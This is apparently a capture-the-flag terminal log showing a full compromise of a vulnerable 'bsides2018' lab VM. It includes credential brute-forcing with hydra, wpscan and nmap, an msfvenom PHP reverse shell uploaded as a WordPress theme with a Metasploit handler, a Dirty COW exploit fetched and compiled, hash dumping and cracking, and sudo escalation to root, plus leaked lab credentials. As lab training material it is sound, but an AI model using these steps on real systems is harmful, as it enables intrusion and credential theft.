Enumeration --

root@7242-alpha-reticuli:~# netdiscover -i wlan0 -r 192.168.1./0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                
                                                                                                                                                                                              
 7 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 402                                                                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.68    dc:3a:5e:1f:85:bd      1      60  Roku, Inc.                                                                                                                                 
 192.168.1.114   50:95:51:83:55:02      1      42  ARRIS Group, Inc.                                                                                                                          
 192.168.1.118   08:00:27:ae:29:fe      1      60  PCS Systemtechnik GmbH                                                                                                                     
 192.168.1.72    d0:bf:9c:b3:85:ce      1      60  Hewlett Packard                                                                                                                            
 192.168.1.69    b0:a7:37:91:c8:ad      2     120  Roku, Inc.                                                                                                                                 
 192.168.1.254   50:95:51:83:55:00      1      60  ARRIS Group, Inc.                                                                                                                          

root@7242-alpha-reticuli:~# 


root@7242-alpha-reticuli:/usr/share/wordlists# nmap -sV -sC -A --script http-enum.nse 192.168.1.118
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-05 09:57 CDT
Nmap scan report for bsides2018.attlocal.net (192.168.1.118)
Host is up (0.00019s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.5
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-enum: 
|_  /robots.txt: Robots file
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms bsides2018.attlocal.net (192.168.1.118)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.35 seconds
root@7242-alpha-reticuli:/usr/share/wordlists# dirb http://192.168.1.118

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Jun  5 09:58:48 2018
URL_BASE: http://192.168.1.118/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.118/ ----
+ http://192.168.1.118/cgi-bin/ (CODE:403|SIZE:289)                                                                                                                                           
+ http://192.168.1.118/index (CODE:200|SIZE:177)                                                                                                                                              
+ http://192.168.1.118/index.html (CODE:200|SIZE:177)                                                                                                                                         
+ http://192.168.1.118/robots (CODE:200|SIZE:43)                                                                                                                                              
+ http://192.168.1.118/robots.txt (CODE:200|SIZE:43)                                                                                                                                          
+ http://192.168.1.118/server-status (CODE:403|SIZE:294)                                                                                                                                      
                                                                                                                                                                                              
-----------------
END_TIME: Tue Jun  5 09:58:55 2018
DOWNLOADED: 4612 - FOUND: 6
root@7242-alpha-reticuli:/usr/share/wordlists# curl http://192.168.1.118/robots.txt
User-agent: *
Disallow: /backup_wordpress

root@7242-alpha-reticuli:/usr/share/wordlists#


09:12:54-cdowns@7242-alpha-reticuli:~$ sudo wpscan --url http://192.168.1.118/backup_wordpress/ --enumerate u --random-agent
---- snip ----
[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2
 |  Last updated: 2018-05-17T00:00:00.000Z
 |  Location: http://192.168.1.118/backup_wordpress/wp-content/themes/twentysixteen/
 |  Readme: http://192.168.1.118/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.5
 |  Style URL: http://192.168.1.118/backup_wordpress/wp-content/themes/twentysixteen/style.css
 |  Referenced style.css: wp-content/themes/twentysixteen/style.css
 |  Theme Name: Twenty Sixteen
 |  Theme URI: https://wordpress.org/themes/twentysixteen/
 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+-------+------+
    | Id | Login | Name |
    +----+-------+------+
    | 1  | admin | admi |
    | 2  | john  | joh  |
    +----+-------+------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Tue Jun  5 09:12:54 2018
[+] Requests Done: 57
[+] Memory used: 37.926 MB
[+] Elapsed time: 00:00:04
09:12:54-cdowns@7242-alpha-reticuli:~$ 


Wordpress Brute Force --
root@7242-alpha-reticuli:/tmp# hydra -L /tmp/users.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.118 -V http-form-post '/backup_wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fbackup_wordpress%2Fwp-admin%2F&testcookie=1:S=Location' -f -I
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-06-05 09:53:04
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:14344399), ~1793050 tries per task
[DATA] attacking http-post-form://192.168.1.118:80//backup_wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fbackup_wordpress%2Fwp-admin%2F&testcookie=1:S=Location
[ATTEMPT] target 192.168.1.118 - login "admin" - pass "123456" - 1 of 28688798 [child 0] (0/0)
[ATTEMPT] target 192.168.1.118 - login "admin" - pass "12345" - 2 of 28688798 [child 1] (0/0)
[ATTEMPT] target 192.168.1.118 - login "admin" - pass "123456789" - 3 of 28688798 [child 2] (0/0)
[ATTEMPT] target 192.168.1.118 - login "admin" - pass "password" - 4 of 28688798 [child 3] (0/0)
[ATTEMPT] target 192.168.1.118 - login "admin" - pass "iloveyou" - 5 of 28688798 [child 4] (0/0)

Try with wpscan --
10:03:32-cdowns@7242-alpha-reticuli:~$ sudo wpscan --url 192.168.1.118/backup_wordpress/ --wordlist /home/cdowns/Github/SecLists/Passwords/darkc0de.txt --username admin
---- snip ----
Brute Forcing 'admin' Time: 00:01:21 <                                                                                                                > (696 / 1471057)  0.04%  ETA: 47:40:02
---- snip ----

try with Nmap --
oot@7242-alpha-reticuli:~# nmap -v -sV --script http-wordpress-brute --script-args 'http-wordpress-brute.uri=/backup_wordpress/wp-login.php,userdb=/tmp/users.txt,passdb=/usr/share/wordlists/rockyou.txt,http-wordpress-brute.hostname=bsides2018.attlocal.net,http-wordpress-brute.thread=3,brute.firstonly=true' 192.168.1.118
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-05 13:38 CDT
NSE: Loaded 44 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Initiating ARP Ping Scan at 13:39
Scanning 192.168.1.118 [1 port]
Completed ARP Ping Scan at 13:39, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:39
Completed Parallel DNS resolution of 1 host. at 13:39, 0.00s elapsed
Initiating SYN Stealth Scan at 13:39
Scanning bsides2018.attlocal.net (192.168.1.118) [1000 ports]
Discovered open port 80/tcp on 192.168.1.118
Discovered open port 21/tcp on 192.168.1.118
Discovered open port 22/tcp on 192.168.1.118
Completed SYN Stealth Scan at 13:39, 0.04s elapsed (1000 total ports)
Initiating Service scan at 13:39
Scanning 3 services on bsides2018.attlocal.net (192.168.1.118)
Completed Service scan at 13:39, 6.01s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.1.118.
Initiating NSE at 13:39
Completed NSE at 13:48, 578.27s elapsed
Initiating NSE at 13:48
Completed NSE at 13:48, 0.00s elapsed
Nmap scan report for bsides2018.attlocal.net (192.168.1.118)
Host is up (0.00033s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.5
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-wordpress-brute: 
|   Accounts: 
|     john:enigma - Valid credentials
|_  Statistics: Performed 5035 guesses in 565 seconds, average tps: 8.7
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 13:48
Completed NSE at 13:48, 0.00s elapsed
Initiating NSE at 13:48
Completed NSE at 13:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 585.32 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)
root@7242-alpha-reticuli:~# 

Wordpress WPAdmin Plugin / Shell Upload --

16:12:46-cdowns@7242-alpha-reticuli:~/Github/wordpress-reverse-bind-shell$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.116 LPORT=31337 -f raw > reverse.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30305 bytes

16:13:50-cdowns@7242-alpha-reticuli:~/Github/wordpress-reverse-bind-shell$ cp -Rvp * shell_theme/
'bind.php' -> 'shell_theme/bind.php'
'cmd.php' -> 'shell_theme/cmd.php'
'Custom' -> 'shell_theme/Custom'
'Custom/shell.php' -> 'shell_theme/Custom/shell.php'
'hello.php' -> 'shell_theme/hello.php'
'README.md' -> 'shell_theme/README.md'
'readme.txt' -> 'shell_theme/readme.txt'
'reverse.php' -> 'shell_theme/reverse.php'
'shell_theme/bind.php' -> 'shell_theme/shell_theme/bind.php'
'shell_theme/cmd.php' -> 'shell_theme/shell_theme/cmd.php'
'shell_theme/hello.php' -> 'shell_theme/shell_theme/hello.php'
'shell_theme/README.md' -> 'shell_theme/shell_theme/README.md'
'shell_theme/readme.txt' -> 'shell_theme/shell_theme/readme.txt'
'shell_theme/reverse.php' -> 'shell_theme/shell_theme/reverse.php'
'shell_theme/shell_theme/shell_theme/shell_theme' -> 'shell_theme/shell_theme/shell_theme/shell_theme/shell_theme'
cp: cannot copy a directory, 'shell_theme', into itself, 'shell_theme/shell_theme'
16:14:00-cdowns@7242-alpha-reticuli:~/Github/wordpress-reverse-bind-shell$ zip -r shell_theme.zip shell_theme/
  adding: shell_theme/ (stored 0%)
  adding: shell_theme/cmd.php (stored 0%)
  adding: shell_theme/reverse.php (deflated 76%)
  adding: shell_theme/shell.php (deflated 76%)
  adding: shell_theme/shell_theme/ (stored 0%)
  adding: shell_theme/shell_theme/cmd.php (stored 0%)
  adding: shell_theme/shell_theme/reverse.php (deflated 76%)
  adding: shell_theme/shell_theme/shell_theme/ (stored 0%)
  adding: shell_theme/shell_theme/shell_theme/shell_theme/ (stored 0%)
  adding: shell_theme/shell_theme/shell_theme/shell_theme/shell_theme/ (stored 0%)
  adding: shell_theme/shell_theme/README.md (deflated 43%)
  adding: shell_theme/shell_theme/hello.php (deflated 34%)
  adding: shell_theme/shell_theme/bind.php (deflated 64%)
  adding: shell_theme/shell_theme/readme.txt (deflated 26%)
  adding: shell_theme/README.md (deflated 43%)
  adding: shell_theme/hello.php (deflated 34%)
  adding: shell_theme/bind.php (deflated 64%)
  adding: shell_theme/readme.txt (deflated 26%)
  adding: shell_theme/Custom/ (stored 0%)
  adding: shell_theme/Custom/shell.php (deflated 76%)
16:14:07-cdowns@7242-alpha-reticuli:~/Github/wordpress-reverse-bind-shell$ 


Compromise / Shell --

www-data@bsides2018:/var/www/backup_wordpress$ hostname ; uname -a ; id ; echo $PATH ; echo $SHELL
PATH ; echo $SHELLa ; id ; echo $ 
bsides2018
Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
bash
www-data@bsides2018:/var/www/backup_wordpress$ cat wp-config.php | grep DB
cat wp-config.php | grep DB
define('DB_NAME', 'wp');
define('DB_USER', 'john@localhost');
define('DB_PASSWORD', 'thiscannotbeit');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
www-data@bsides2018:/var/www/backup_wordpress$ 


root@7242-alpha-reticuli:~# msfconsole -q -x "use exploit/multi/handler; set LHOST 192.168.1.116; set LPORT 31337; set PAYLOAD php/meterpreter_reverse_tcp; set ExitOnSession false ; exploit -j -z"
LHOST => 192.168.1.116
LPORT => 31337
PAYLOAD => php/meterpreter_reverse_tcp
ExitOnSession => false
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.116:31337 
msf exploit(multi/handler) > [*] Meterpreter session 1 opened (192.168.1.116:31337 -> 192.168.1.118:38295) at 2018-06-06 10:54:06 -0500
sessions 1
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: www-data (33)
meterpreter > shell
Process 2726 created.
Channel 0 created.
bash -i
bash: no job control in this shell
<w/backup_wordpress/wp-content/plugins/shell_theme$ cd /tmp ; wget -q -c https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c --no-check-certificate
<m/FireFart/dirtycow/master/dirty.c --no-check-certificate                   
www-data@bsides2018:/tmp$ hostname ; uname -a ; id ; echo $PATH ; echo $SHELL
hostname ; uname -a ; id ; echo $PATH ; echo $SHELL
bsides2018
Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/local/bin:/usr/bin:/bin
/bin/sh
www-data@bsides2018:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@bsides2018:/tmp$ ./dirty pwn3edb1tch
./dirty pwn3edb1tch

# Let's try to get user abatchy --
# from LinEnum.sh
[-] It looks like we have some admin users:
uid=1000(abatchy) gid=1000(abatchy) groups=1000(abatchy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)

www-data@bsides2018:/tmp$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(1000);\n\tsystem("/bin/bash -i");\n}' > setuid.c               
www-data@bsides2018:/tmp$ 

Modify SUID bit ?

www-data@bsides2018:/tmp$ find . \( -group 0 -a ! -uid 0 \) -type f -ls
find . \( -group 0 -a ! -uid 0 \) -type f -ls
find: `./pulse-PKdhtXMmr18n': Permission denied
www-data@bsides2018:/tmp$ 

Crack Password ?


www-data@bsides2018:/tmp$  python -c 'import pty;pty.spawn("/bin/bash")'
 python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bsides2018:/tmp$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
<xport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin     
www-data@bsides2018:/tmp$ export TERM=xterm
export TERM=xterm
www-data@bsides2018:/tmp$ export SHELL=bash
export SHELL=bash
www-data@bsides2018:/tmp$ mysql -u john@localhost -h localhost -p
mysql -u john@localhost -h localhost -p
Enter password: thiscannotbeit

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.54-0ubuntu0.12.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wp                 |
+--------------------+
2 rows in set (0.00 sec)

mysql> use wp;
use wp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_wp          |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email         | user_url | user_registered     | user_activation_key                           | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+
|  1 | admin      | $P$BmuGRQyHFjh1FW29/KN6GvfYnwIl/O0 | admin         | admin@thissite.com |          | 2018-03-07 20:05:07 | 1528217069:$P$BKBuFFhkFhq45pLlRDtShQ1ExsWDkC. |           0 | admin        |
|  2 | john       | $P$BVlPsus0zgh1RoU3VGUI4zfyNNPcyT0 | john          | john@thissite.com  |          | 2018-03-07 20:06:16 |                                               |           0 | john         |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.00 sec)

mysql> 

root@7242-alpha-reticuli:~# hashid '$P$BmuGRQyHFjh1FW29/KN6GvfYnwIl/O0'
Analyzing '$P$BmuGRQyHFjh1FW29/KN6GvfYnwIl/O0'
[+] Wordpress ≥ v2.6.2 
[+] Joomla ≥ v2.5.18 
[+] PHPass' Portable Hash 
root@7242-alpha-reticuli:~#


root@7242-alpha-reticuli:~# hashcat -a 0 -m 400 -d 1 /tmp/mysql.hash /usr/share/wordlists/rockyou.txt --force -O
hashcat (v4.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 8192/30002 MB allocatable, 8MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Optimized-Kernel
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55
----- snip -----

Let's check sshd_config --

www-data@bsides2018:/tmp$ cat /etc/ssh/sshd_config | egrep "Match|PasswordAuthentication"
<at /etc/ssh/sshd_config | egrep "Match|PasswordAuthentication"              
#PasswordAuthentication yes
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication, then enable this but set PasswordAuthentication
Match User abatchy,john,mai,doomguy
	PasswordAuthentication no
www-data@bsides2018:/tmp$  

OK: Brute force ssh accounts --
(while we crack admin msql account ) --

root@7242-alpha-reticuli:/usr/share/nmap# nmap --script ssh-brute.nse --script-args userdb=/tmp/users.txt,passdb=/usr/share/wordlists/nmap.lst -p 22 192.168.1.118
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-07 19:30 CDT
NSE: [ssh-brute] Trying username/password pair: abatchy:abatchy
NSE: [ssh-brute] Trying username/password pair: john:john
NSE: [ssh-brute] Trying username/password pair: mai:mai
NSE: [ssh-brute] Trying username/password pair: anne:anne
NSE: [ssh-brute] Trying username/password pair: doomguy:doomguy
---- snip ----
NSE: [ssh-brute] Trying username/password pair: john:guitar
NSE: [ssh-brute] Trying username/password pair: mai:guitar
NSE: [ssh-brute] Trying username/password pair: doomguy:guitar
NSE: [ssh-brute] Trying username/password pair: :guitar
NSE: [ssh-brute] Trying username/password pair: abatchy:dallas
NSE: [ssh-brute] Trying username/password pair: john:dallas
Nmap scan report for bsides2018.attlocal.net (192.168.1.118)
Host is up (0.00048s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     anne:princess - Valid credentials
|_  Statistics: Performed 2604 guesses in 900 seconds, average tps: 2.9
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 900.75 seconds
root@7242-alpha-reticuli:/usr/share/nmap# ssh -p 22 anne@192.168.1.118
anne@192.168.1.118's password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

382 packages can be updated.
275 updates are security updates.

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Mar  4 16:14:55 2018 from 192.168.1.68
anne@bsides2018:~$ sudo -l
[sudo] password for anne: 
Matching Defaults entries for anne on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anne may run the following commands on this host:
    (ALL : ALL) ALL
anne@bsides2018:~$ sudo su - 
root@bsides2018:~# id
uid=0(root) gid=0(root) groups=0(root)
root@bsides2018:~# cat 
.bash_history     .bashrc           flag.txt          .mysql_history    .profile          .pulse/           .pulse-cookie     .selected_editor  
root@bsides2018:~# cat flag.txt 
Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?

@abatchy17

root@bsides2018:~# 






